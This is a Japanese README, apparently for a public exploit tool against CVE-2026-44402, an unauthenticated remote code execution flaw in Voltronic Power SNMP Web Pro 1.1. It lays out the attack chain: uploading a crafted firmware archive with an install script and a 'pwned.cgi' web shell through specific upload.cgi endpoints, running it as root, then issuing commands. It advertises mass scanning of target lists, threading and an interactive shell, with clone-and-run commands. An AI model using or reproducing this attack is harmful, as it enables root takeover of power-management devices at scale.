
CVE-2026-44402 のエクスプロイト。Voltronic Power SNMP Web Pro 1.1 を標的とし、悪意のあるファームウェアのアップロードを介して認証なしのリモートコード実行を可能にします。単一ターゲットと大量スキャンをサポートし、対話型シェルを備えています。
| プロパティ | 値 |
|---|
| CVE ID | CVE-2026-44402 |
| CVSS スコア | 9.8 (Critical) |
| CWE | CWE-434 — 危険なタイプのファイルの無制限アップロード |
| 影響を受ける製品 | Voltronic Power SNMP Web Pro 1.1 |
| 認証の必要性 | 不要 (認証なし) |
| 攻撃ベクトル | ネットワークベース (リモート) |
| 権限 | rootレベルのRCE |
この脆弱性は、ファームウェア更新機能 (upload.cgi) に存在します。このエンドポイントは:
悪意のあるアーカイブを作成
upgrade/install.sh — インストールスクリプトupgrade/pwned.cgi — Webシェルアーカイブをアップロード → POST /cgi-bin/upload.cgi?name=upgrade&?params=upload
"ACK"アーカイブを展開 → GET /cgi-bin/upload.cgi?name=upgrade&?params=extract
"ACK"インストール → GET /cgi-bin/upload.cgi?name=upgrade&?params=install
install.sh がrootとして実行される"ACK"Webシェルが有効化 → POST /cgi-bin/pwned.cgi
cmd パラメータでコマンドを実行 → RCE! 🚀-u)-f targets.txt)-t 20) — 高速な並列処理--shell) — cd サポート付きurl | output 形式--proxy)--timeout)-v)requests と prompt_toolkit 以外の外部依存関係なし# リポジトリをクローン
git clone https://github.com/0xCyp1337/CVE-2026-44402.git
cd CVE-2026-44402
python3 CVE-2026-44402.py